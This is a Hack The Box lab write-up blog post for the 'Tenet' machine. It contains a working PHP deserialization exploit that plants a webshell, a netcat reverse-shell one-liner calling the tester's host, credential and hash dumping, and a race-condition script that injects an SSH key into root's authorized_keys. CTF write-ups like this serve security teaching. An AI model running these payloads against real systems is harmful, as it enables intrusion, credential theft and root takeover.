<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.21.0 by Michael Rose
  Copyright 2013-2020 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->
<html lang="en" class="no-js">
  <head>
    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>Hackthebox write-up: Tenet | Davi Cruz</title>
<meta name="description" content="Hello guys!  This week’s machine will be Tenet, another medium-rated Linux box from Hack The Box, created by egotisticalSW.">


  <meta name="author" content="Davi Cruz">
  
  <meta property="article:author" content="Davi Cruz">
  


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="Davi Cruz">
<meta property="og:title" content="Hackthebox write-up: Tenet">
<meta property="og:url" content="https://davicruz.com/writeup/2021/06/htb-tenet/">


  <meta property="og:description" content="Hello guys!  This week’s machine will be Tenet, another medium-rated Linux box from Hack The Box, created by egotisticalSW.">



  <meta property="og:image" content="https://i.imgur.com/BmkB4rb.png">



  <meta name="twitter:site" content="@zerahzurc">
  <meta name="twitter:title" content="Hackthebox write-up: Tenet">
  <meta name="twitter:description" content="Hello guys!  This week’s machine will be Tenet, another medium-rated Linux box from Hack The Box, created by egotisticalSW.">
  <meta name="twitter:domain" content="davicruz.com">
  <meta name="twitter:url" content="https://davicruz.com/writeup/2021/06/htb-tenet/">

  
    <meta name="twitter:card" content="summary">
    
      <meta name="twitter:image" content="https://i.imgur.com/BmkB4rb.png">
    
  

  



  <meta property="article:published_time" content="2021-06-12T13:00:00-03:00">





  

  


<link rel="canonical" href="https://davicruz.com/writeup/2021/06/htb-tenet/">




<script type="application/ld+json">
  {
    "@context": "https://schema.org",
    
      "@type": "Person",
      "name": "Davi Cruz",
      "url": "https://davicruz.com/",
      "sameAs": ["https://twitter.com/zerahzurc","https://www.linkedin.com/in/davicruz","https://github.com/davi-cruz"]
    
  }
</script>


  <meta name="google-site-verification" content="hrWV-PqvbpxEy2HdpVYFQNws2Sz_tROleVyF18s2kWA" />


  <meta name="msvalidate.01" content="60B1FA6CDAF15D226AB529AF30386BD8">



  <meta name="yandex-verification" content="08de8d8c0326420f">


<!-- end _includes/seo.html -->


<link href="/feed.xml" type="application/atom+xml" rel="alternate" title="Davi Cruz Feed">

<!-- https://t.co/dKP3o1e -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css">

<!--[if IE]>
  <style>
    /* old IE unsupported flexbox fixes */
    .greedy-nav .site-title {
      padding-right: 3em;
    }
    .greedy-nav button {
      position: absolute;
      top: 0;
      right: 0;
      height: 100%;
    }
  </style>
<![endif]-->



    <!-- start custom head snippets -->
<!-- Favicon -->
<link rel="shortcut icon" href="/assets/images/favicon.ico" />

<!-- Multilang tags -->

    
<link rel="alternate" hreflang="pt-BR" href="/writeup/2021/06/htb-tenet/">
    

    
<link rel="alternate" hreflang="en-US" href="/en-US/writeup/2021/06/htb-tenet/">
    


<!-- Cookie Consent - Osano -->
<link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/cookieconsent@3/build/cookieconsent.min.css" />

<!-- end custom head snippets -->

  </head>

  <body class="layout--single wide">
    <nav class="skip-links">
  <h2 class="screen-reader-text">Skip links</h2>
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Skip to primary navigation</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Skip to content</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Skip to footer</a></li>
  </ul>
</nav>

    <!--[if lt IE 9]>
<div class="notice--danger align-center" style="margin: 0;">You are using an <strong>outdated</strong> browser. Please <a href="https://browsehappy.com/">upgrade your browser</a> to improve your experience.</div>
<![endif]-->

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        
          
          <a class="site-logo" href="https://davicruz.com/en-US"><img src="/assets/images/logo.png" alt=""></a>
          
          <a class="site-title" href="https://davicruz.com/en-US">
            Davi Cruz
            
          </a>
        
        <ul class="visible-links">
<li class="masthead__menu-item">
            <a href="/en-US/categories/">Categories</a>
          </li>
<li class="masthead__menu-item">
            <a href="/en-US/tag/">Tags</a>
          </li>
<li class="masthead__menu-item">
            <a href="/en-US/about/">About</a>
          </li>
</ul>
        
        <button class="search__toggle" type="button">
          <span class="visually-hidden">Toggle search</span>
          <svg class="icon" width="16" height="16" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 15.99 16">
            <path d="M15.5,13.12L13.19,10.8a1.69,1.69,0,0,0-1.28-.55l-0.06-.06A6.5,6.5,0,0,0,5.77,0,6.5,6.5,0,0,0,2.46,11.59a6.47,6.47,0,0,0,7.74.26l0.05,0.05a1.65,1.65,0,0,0,.5,1.24l2.38,2.38A1.68,1.68,0,0,0,15.5,13.12ZM6.4,2A4.41,4.41,0,1,1,2,6.4,4.43,4.43,0,0,1,6.4,2Z" transform="translate(-.01)"></path>
          </svg>
        </button>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Toggle menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      



<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person">

  
    <div class="author__avatar">
      
        <img src="/assets/images/bio-photo.jpg" alt="Davi Cruz" itemprop="image">
      
    </div>
  

  <div class="author__content">
    
      <h3 class="author__name" itemprop="name">Davi Cruz</h3>
    
    
      <div class="author__bio" itemprop="description">
        <p>Just another Cybersecurity professional</p>

      </div>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Follow</button>
    <ul class="author__urls social-icons">
      
        <li itemprop="homeLocation" itemscope itemtype="https://schema.org/Place">
          <i class="fas fa-fw fa-map-marker-alt" aria-hidden="true"></i> <span itemprop="name">São Paulo, BR</span>
        </li>
      

      
        
          
            <li><a href="https://linkedin.com/in/davicruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fab fa-linkedin" aria-hidden="true"></i><span class="label">Linkedin</span></a></li>
          
        
          
            <li><a href="https://twitter.com/zerahzurc" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i><span class="label">Twitter</span></a></li>
          
        
          
            <li><a href="https://github.com/davi-cruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-github" aria-hidden="true"></i><span class="label">GitHub</span></a></li>
          
        
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      
<li>
  <strong></strong>
  
  <a class="link-br" href=""></a>
  
</li>

    </ul>
  </div>
</div>

  
  </div>



  <article class="page" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="Hackthebox write-up: Tenet">
    <meta itemprop="description" content="Hello guys!This week’s machine will be Tenet, another medium-rated Linux box from Hack The Box, created by egotisticalSW.">
    <meta itemprop="datePublished" content="2021-06-12T13:00:00-03:00">
    

    <div class="page__inner-wrap">
      
        <header>
          <h1 id="page-title" class="page__title" itemprop="headline">Hackthebox write-up: Tenet
</h1>
          

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-calendar-alt" aria-hidden="true"></i>
        <time datetime="2021-06-12T13:00:00-03:00">June 12, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          7 minute read
        
      </span>
    


      <!-- Start Read in other languages-->
        <span class="page__meta-sep page__meta-lang"></span>
        
        
        
        <span class="page__meta-lang"><a href="/writeup/2021/06/htb-tenet/">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
        

        

        

        
        
        
        
      <!-- End Read in other languages-->
      <span class="page__meta-sep page__meta-share"></span>
      <span class="page__meta-share">
        <i class="fas fa-share-alt" aria-hidden="true"></i>
        <a href="#sharelinks">Share</a>
      </span>
  </p>


        </header>
      

      <section class="page__content" itemprop="text">
        
        <p>Hello guys!</p>

<p>This week’s machine will be <strong>Tenet</strong>, another medium-rated Linux box from <a href="https://www.hackthebox.eu/">Hack The Box</a>, created by <a href="https://app.hackthebox.eu/users/94858">egotisticalSW</a>.<!--more--></p>

<p class="notice--info"><img class="emoji" title=":information_source:" alt=":information_source:" src="https://github.githubassets.com/images/icons/emoji/unicode/2139.png" height="20" width="20"> <strong>Info</strong>: Write-ups for Hack The Box machines are posted as soon as they’re retired.</p>

<p><img src="https://i.imgur.com/ogdM1De.png" alt="HTB Tenet" class="align-center"></p>

<p>Before starting the resolution of this box, the image above called my attention, where I searched about TENET on the Internet and found about the Sator Square, where we have a palindrome made up of the 5 Latin words: <em>SATOR</em>, <em>AREPO</em>, <em>TENET</em>, <em>OPERA</em> e <em>ROTAS</em>, forming a square being TENET in the center lines. Is highly probable that these words will appear during it’s resolution <img class="emoji" title=":smile:" alt=":smile:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f604.png" height="20" width="20">.</p>

<h2 id="enumeration">Enumeration</h2>

<p>As usual, started with a quick <code class="language-plaintext highlighter-rouge">nmap</code> scan to identify the published services:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-Pn</span> <span class="nt">-oA</span> quick 10.10.10.223
Host discovery disabled <span class="o">(</span><span class="nt">-Pn</span><span class="o">)</span><span class="nb">.</span> All addresses will be marked <span class="s1">'up'</span> and scan <span class="nb">times </span>will be slower.
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-02-27 14:36 <span class="nt">-03</span>
Nmap scan report <span class="k">for </span>10.10.10.223
Host is up <span class="o">(</span>0.079s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 <span class="o">(</span>RSA<span class="o">)</span>
|   256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    Apache httpd 2.4.29 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-server-header: Apache/2.4.29 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>18.06 seconds
</code></pre></div></div>

<h3 id="80tcp---http-service">80/TCP - HTTP Service</h3>

<p>Accessing this page noticed that was from the default Apache install so started right away to enumerate the directories using <code class="language-plaintext highlighter-rouge">gobuster</code> where I’ve found the <strong>wordpress</strong> directory.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>gobuster <span class="nb">dir</span> <span class="nt">-w</span> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt <span class="nt">-u</span> http://10.10.10.223/ <span class="nt">-o</span> gobuster.txt <span class="nt">-x</span> php,txt,html
<span class="o">===============================================================</span>
Gobuster v3.0.1
by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> &amp; Christian Mehlmauer <span class="o">(</span>@_FireFart_<span class="o">)</span>
<span class="o">===============================================================</span>
<span class="o">[</span>+] Url:            http://10.10.10.223/
<span class="o">[</span>+] Threads:        10
<span class="o">[</span>+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
<span class="o">[</span>+] Status codes:   200,204,301,302,307,401,403
<span class="o">[</span>+] User Agent:     gobuster/3.0.1
<span class="o">[</span>+] Extensions:     php,txt,html
<span class="o">[</span>+] Timeout:        10s
<span class="o">===============================================================</span>
2021/02/27 14:44:51 Starting gobuster
<span class="o">===============================================================</span>
/index.html <span class="o">(</span>Status: 200<span class="o">)</span>
/users.txt <span class="o">(</span>Status: 200<span class="o">)</span>
/wordpress <span class="o">(</span>Status: 301<span class="o">)</span>
Progress: 5055 / 220561 <span class="o">(</span>2.29%<span class="o">)</span>^C
<span class="o">[!]</span> Keyboard interrupt detected, terminating.
<span class="o">===============================================================</span>
2021/02/27 14:48:08 Finished
<span class="o">===============================================================</span>
</code></pre></div></div>

<p>Once accessed it the page was loaded without formatting and, inspecting the source code, all the assets were pointing to <strong>tenet.htb</strong>, which was later added to <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file.</p>

<p>Accessing the page again, checked that it was properly rendered now and then used <code class="language-plaintext highlighter-rouge">wpscan</code> to enumerate version, users, and plugins, where I’ve identified this wordpress version as 5.6, no plugins and the users <strong>protagonist</strong> and <strong>neil</strong>.</p>

<p>As accessing the webpage again from the url <code class="language-plaintext highlighter-rouge">http://10.10.10.223/wordpress</code> errors are shown, as the image below, accessed the address saw in source code (<code class="language-plaintext highlighter-rouge">http://tenet.htb</code>) full blog is displayed.</p>

<p><img src="https://i.imgur.com/u4M23iB.png" alt="HTB Tenet - 80/TCP" class="align-center"></p>

<p>In the wordpress instance available at <code class="language-plaintext highlighter-rouge">http://tenet.htb/wordpress</code>, noticed some posts where one of them was mentioning an application called <strong>Rotas</strong>, which could contain some item we could abuse to get an initial foothold in this box.</p>

<blockquote>
  <p>This Is Where Our Worlds Collide
We’re looking for beta testers of our new time-management software, ‘Rotas’
‘Rotas’ will hopefully be coming to market late 2021, pending rigorous QA from our developers, and you! For more information regarding opting-in, watch this space.</p>
</blockquote>

<p>Things gets more interesting in an older post, where user <strong>neil</strong> comments the content below:</p>

<blockquote>
  <p>did you remove the sator php file and the backup?? the migration program is incomplete! why would you do this?!</p>
</blockquote>

<p>Trying to access the file <code class="language-plaintext highlighter-rouge">sator.php</code> from the directory published under the dns name hasn’t returned anything, but I’ve succeeded using the machine IP address, getting the output below:</p>

<p><img src="https://i.imgur.com/OOaRPfQ.png" alt="HTB Tenet - sator.php" class="align-center"></p>

<p>As we have a backup of this file somewhere and backups are often renamed as <code class="language-plaintext highlighter-rouge">old</code> or <code class="language-plaintext highlighter-rouge">bak</code>, after a few attempts I have found the file <code class="language-plaintext highlighter-rouge">sator.php.bak</code> in the same directory as the previous, with the following content:</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>

<span class="kd">class</span> <span class="nc">DatabaseExport</span>
<span class="p">{</span>
    <span class="k">public</span> <span class="nv">$user_file</span> <span class="o">=</span> <span class="s1">'users.txt'</span><span class="p">;</span>
    <span class="k">public</span> <span class="nv">$data</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span>
    
    <span class="k">public</span> <span class="k">function</span> <span class="n">update_db</span><span class="p">()</span>
    <span class="p">{</span>
        <span class="k">echo</span> <span class="s1">'[+] Grabbing users from text file &lt;br&gt;'</span><span class="p">;</span>
        <span class="nv">$this</span><span class="o">-&gt;</span> <span class="n">data</span> <span class="o">=</span> <span class="s1">'Success'</span><span class="p">;</span>
    <span class="p">}</span>
    
    <span class="k">public</span> <span class="k">function</span> <span class="n">__destruct</span><span class="p">()</span>
    <span class="p">{</span>
        <span class="nb">file_put_contents</span><span class="p">(</span><span class="k">__DIR__</span> <span class="mf">.</span> <span class="s1">'/'</span> <span class="mf">.</span> <span class="nv">$this</span> <span class="o">-&gt;</span><span class="n">user_file</span><span class="p">,</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">);</span>
        <span class="k">echo</span> <span class="s1">'[] Database updated &lt;br&gt;'</span><span class="p">;</span>
        <span class="c1">//    echo 'Gotta get this working properly...';</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="nv">$input</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'arepo'</span><span class="p">]</span> <span class="o">??</span> <span class="s1">''</span><span class="p">;</span>
<span class="nv">$databaseupdate</span> <span class="o">=</span> <span class="nb">unserialize</span><span class="p">(</span><span class="nv">$input</span><span class="p">);</span>

<span class="nv">$app</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">DatabaseExport</span><span class="p">;</span>
<span class="nv">$app</span> <span class="o">-&gt;</span> <span class="nf">update_db</span><span class="p">();</span>

<span class="cp">?&gt;</span>
</code></pre></div></div>

<p>As we can see we could exploit it using <strong>PHP Deserialization</strong>, once it doesn’t validate the inputs received using GET method from the query string arg  <strong>arepo</strong>, allowing us to modify the payload to be stored in the database file.</p>

<h2 id="initial-access">Initial access</h2>

<p>The first step to the reverse shell was to create a serialized PHP payload to be sent in a request via <strong>arepo</strong> arg. Searching a little about it I have found <a href="https://github.com/1N3/Exploits/blob/master/PHP-Serialization-RCE-Exploit.php">this exploit sample</a> which was later modified to store a simple webshell in the box, later used to get a reverse shell.</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span> 

<span class="kd">class</span> <span class="nc">DatabaseExport</span>
<span class="p">{</span>
    <span class="k">public</span> <span class="nv">$user_file</span> <span class="o">=</span> <span class="s1">'shell.php'</span><span class="p">;</span>
    <span class="k">public</span> <span class="nv">$data</span> <span class="o">=</span> <span class="s1">'&lt;?php system($_GET["cmd"]); ?&gt;'</span><span class="p">;</span>
    
    <span class="k">public</span> <span class="k">function</span> <span class="n">update_db</span><span class="p">()</span>
    <span class="p">{</span>
        <span class="k">echo</span> <span class="s1">'[+] Grabbing users from text file &lt;br&gt;'</span><span class="p">;</span>
        <span class="nv">$this</span><span class="o">-&gt;</span> <span class="n">data</span> <span class="o">=</span> <span class="s1">'Success'</span><span class="p">;</span>
    <span class="p">}</span>
    
    <span class="k">public</span> <span class="k">function</span> <span class="n">__destruct</span><span class="p">()</span>
    <span class="p">{</span>
        <span class="nb">file_put_contents</span><span class="p">(</span><span class="k">__DIR__</span> <span class="mf">.</span> <span class="s1">'/'</span> <span class="mf">.</span> <span class="nv">$this</span> <span class="o">-&gt;</span><span class="n">user_file</span><span class="p">,</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">);</span>
        <span class="k">echo</span> <span class="s1">'[] Database updated &lt;br&gt;'</span><span class="p">;</span>
        <span class="c1">//    echo 'Gotta get this working properly...';</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="nv">$url</span> <span class="o">=</span> <span class="s1">'http://10.10.10.223/sator.php?arepo='</span><span class="p">;</span>
<span class="nv">$arepo</span> <span class="o">=</span> <span class="nv">$url</span> <span class="mf">.</span> <span class="nb">urlencode</span><span class="p">(</span><span class="nb">serialize</span><span class="p">(</span><span class="k">new</span> <span class="nc">DatabaseExport</span><span class="p">));</span>
<span class="nv">$response</span> <span class="o">=</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="s2">"</span><span class="nv">$arepo</span><span class="s2">"</span><span class="p">);</span>
<span class="k">print</span> <span class="s2">"</span><span class="nv">$response</span><span class="s2">"</span><span class="p">;</span>
</code></pre></div></div>

<p>After its execution, I was able to issue the <code class="language-plaintext highlighter-rouge">id</code> command by using curl as we can see below.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>php exploit.php
<span class="o">[]</span> Database updated &lt;br&gt;[+] Grabbing <span class="nb">users </span>from text file &lt;br&gt;
<span class="o">[]</span> Database updated &lt;br&gt;[] Database updated &lt;br&gt;   

<span class="nv">$ </span>curl <span class="nt">-L</span> http://10.10.10.223/shell.php?cmd<span class="o">=</span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span>
</code></pre></div></div>

<p>As we had a confirmed RCE, make the call to obtain a reverse shell as the following example:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-G</span> <span class="nt">--data-urlencode</span> <span class="s2">"cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.136 4443 &gt;/tmp/f"</span> http://10.10.10.223/shell.php
</code></pre></div></div>

<h2 id="user-flag">User Flag</h2>

<p>Accessing the box, once we already knew that at least one wordpress instance was present, searched for the <code class="language-plaintext highlighter-rouge">wp-config.php</code> file where I got the credentials for user <strong>neil</strong></p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// ** MySQL settings - You can get this info from your web host ** //</span>
<span class="cd">/** The name of the database for WordPress */</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_NAME'</span><span class="p">,</span> <span class="s1">'wordpress'</span> <span class="p">);</span>

<span class="cd">/** MySQL database username */</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_USER'</span><span class="p">,</span> <span class="s1">'neil'</span> <span class="p">);</span>

<span class="cd">/** MySQL database password */</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_PASSWORD'</span><span class="p">,</span> <span class="s1">'Opera2112'</span> <span class="p">);</span>

<span class="cd">/** MySQL hostname */</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_HOST'</span><span class="p">,</span> <span class="s1">'localhost'</span> <span class="p">);</span>
</code></pre></div></div>

<p>As credential reuse is common, running <code class="language-plaintext highlighter-rouge">su neil</code> and providing the recently found password, we have succeeded in accessing the machine as this user and getting the user flag.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>neil@tenet:~<span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>1001<span class="o">(</span>neil<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>neil<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1001<span class="o">(</span>neil<span class="o">)</span>
neil@tenet:~<span class="nv">$ </span><span class="nb">cat</span> ~/user.txt
&lt;redacted&gt;
neil@tenet:~<span class="err">$</span>
</code></pre></div></div>

<h2 id="root-flag">Root Flag</h2>

<p>In the path for root flag, decided to dump the database credentials in this machine, returning the following hashes.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mysql&gt; select user_login,user_pass from wp_users;
+-------------+------------------------------------+
| user_login  | user_pass                          |
+-------------+------------------------------------+
| protagonist | $P$BqNNfN07OWdaEfHmGwufBs.b.BebvZ. |
| neil        | $P$BtFC5SOvjEMFWLE4zq5DWXy7sJPUqM. |
+-------------+------------------------------------+
2 rows in set (0.00 sec)
</code></pre></div></div>

<p>Before trying to crack those hashes, being <code class="language-plaintext highlighter-rouge">protagonist</code> password reused from <code class="language-plaintext highlighter-rouge">root</code>, decided to check which permissions did <code class="language-plaintext highlighter-rouge">neil</code> had by running <code class="language-plaintext highlighter-rouge">sudo -l</code>, which resulted in the output below.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Matching Defaults entries for www-data on tenet:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:
    
User www-data may run the following commands on tenet:
    (ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh
</code></pre></div></div>

<p>Inspecting the content of this file, we can see that it can be used to activate SSH login for <code class="language-plaintext highlighter-rouge">root</code> enforcing an existing SSH public key.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span>

checkAdded<span class="o">()</span> <span class="o">{</span>
    <span class="nv">sshName</span><span class="o">=</span><span class="si">$(</span>/bin/echo <span class="nv">$key</span> | /usr/bin/cut <span class="nt">-d</span> <span class="s2">" "</span> <span class="nt">-f</span> 3<span class="si">)</span>
    <span class="k">if</span> <span class="o">[[</span> <span class="o">!</span> <span class="nt">-z</span> <span class="si">$(</span>/bin/grep <span class="nv">$sshName</span> /root/.ssh/authorized_keys<span class="si">)</span> <span class="o">]]</span><span class="p">;</span> <span class="k">then</span>
        /bin/echo <span class="s2">"Successfully added </span><span class="nv">$sshName</span><span class="s2"> to authorized_keys file!"</span>
    <span class="k">else</span>
        /bin/echo <span class="s2">"Error in adding </span><span class="nv">$sshName</span><span class="s2"> to authorized_keys file!"</span>
    <span class="k">fi</span>
<span class="o">}</span>

checkFile<span class="o">()</span> <span class="o">{</span>
    <span class="k">if</span> <span class="o">[[</span> <span class="o">!</span> <span class="nt">-s</span> <span class="nv">$1</span> <span class="o">]]</span> <span class="o">||</span> <span class="o">[[</span> <span class="o">!</span> <span class="nt">-f</span> <span class="nv">$1</span> <span class="o">]]</span><span class="p">;</span> <span class="k">then</span>
        /bin/echo <span class="s2">"Error in creating key file!"</span>
        <span class="k">if</span> <span class="o">[[</span> <span class="nt">-f</span> <span class="nv">$1</span> <span class="o">]]</span><span class="p">;</span> <span class="k">then</span> /bin/rm <span class="nv">$1</span><span class="p">;</span> <span class="k">fi
        </span><span class="nb">exit </span>1
    <span class="k">fi</span>
<span class="o">}</span>

addKey<span class="o">()</span> <span class="o">{</span>
    <span class="nv">tmpName</span><span class="o">=</span><span class="si">$(</span><span class="nb">mktemp</span> <span class="nt">-u</span> /tmp/ssh-XXXXXXXX<span class="si">)</span>
    <span class="o">(</span><span class="nb">umask </span>110<span class="p">;</span> <span class="nb">touch</span> <span class="nv">$tmpName</span><span class="o">)</span>
    /bin/echo <span class="nv">$key</span> <span class="o">&gt;&gt;</span><span class="nv">$tmpName</span>
    checkFile <span class="nv">$tmpName</span>
    /bin/cat <span class="nv">$tmpName</span> <span class="o">&gt;&gt;</span>/root/.ssh/authorized_keys
    /bin/rm <span class="nv">$tmpName</span>
<span class="o">}</span>

<span class="nv">key</span><span class="o">=</span><span class="s2">"ssh-rsa AAAAA3NzaG1yc2GAAAAGAQAAAAAAAQG+AMU8OGdqbaPP/Ls7bXOa9jNlNzNOgXiQh6ih2WOhVgGjqr2449ZtsGvSruYibxN+MQLG59VkuLNU4NNiadGry0wT7zpALGg2Gl3A0bQnN13YkL3AA8TlU/ypAuocPVZWOVmNjGlftZG9AP656hL+c9RfqvNLVcvvQvhNNbAvzaGR2XOVOVfxt+AmVLGTlSqgRXi6/NyqdzG5Nkn9L/GZGa9hcwM8+4nT43N6N31lNhx4NeGabNx33b25lqermjA+RGWMvGN8siaGskvgaSbuzaMGV9N8umLp6lNo5fqSpiGN8MQSNsXa3xXG+kplLn2W+pbzbgwTNN/w0p+Urjbl root@ubuntu"</span>
addKey
checkAdded
</code></pre></div></div>

<p>As we don’t have the private key, we could possibly hijack it’s execution because the function <code class="language-plaintext highlighter-rouge">addKey</code> creates a temporary file containing the public key to be added to <code class="language-plaintext highlighter-rouge">root</code>’s authorized keys, having a race condition. If we could manage to overwrite this file during the script execution, we could inject our public key instead of the one present in the script.</p>

<p>The challenge here is to predict the name of the file created, once it uses the <code class="language-plaintext highlighter-rouge">mktemp</code> command, but as we have an idea of its format (<code class="language-plaintext highlighter-rouge">/tmp/ssh-XXXXX</code>) we could find a way to paste the contents from our public key to all files matching the same pattern. After some tests and research, the command <code class="language-plaintext highlighter-rouge">tee</code> was the solution, allowing us to output a content to multiple files at the same time. The simple script below was created to do this task.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span>
<span class="k">while </span><span class="nb">true</span><span class="p">;</span> <span class="k">do
        </span><span class="nb">echo</span> <span class="s2">"ssh-rsa AAAA..............BBBB= root@ubuntu"</span> | <span class="nb">tee</span> /tmp/ssh-<span class="k">*</span> 2&gt; /dev/null<span class="p">;</span>
<span class="k">done</span>
</code></pre></div></div>

<p>With the above script in execution, simply executed the bash script with <code class="language-plaintext highlighter-rouge">sudo</code> and then connected to the box with the previously created ssh private key, granting me root access and allowing to get the root flag <img class="emoji" title=":smiley:" alt=":smiley:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f603.png" height="20" width="20"></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>neil@tenet:/tmp<span class="nv">$ </span><span class="nb">sudo</span>  /usr/local/bin/enableSSH.sh
Successfully added root@ubuntu to authorized_keys file!
neil@tenet:/tmp<span class="nv">$ </span>ssh <span class="nt">-i</span> tenet root@tenet.htb
Welcome to Ubuntu 18.04.5 LTS <span class="o">(</span>GNU/Linux 4.15.0-129-generic x86_64<span class="o">)</span>
<span class="o">[</span>...]
root@tenet:~# <span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
root@tenet:~# <span class="nb">cat</span> /root/root.txt
b05e57e997cda49b47757cd3f0f9ac43
</code></pre></div></div>

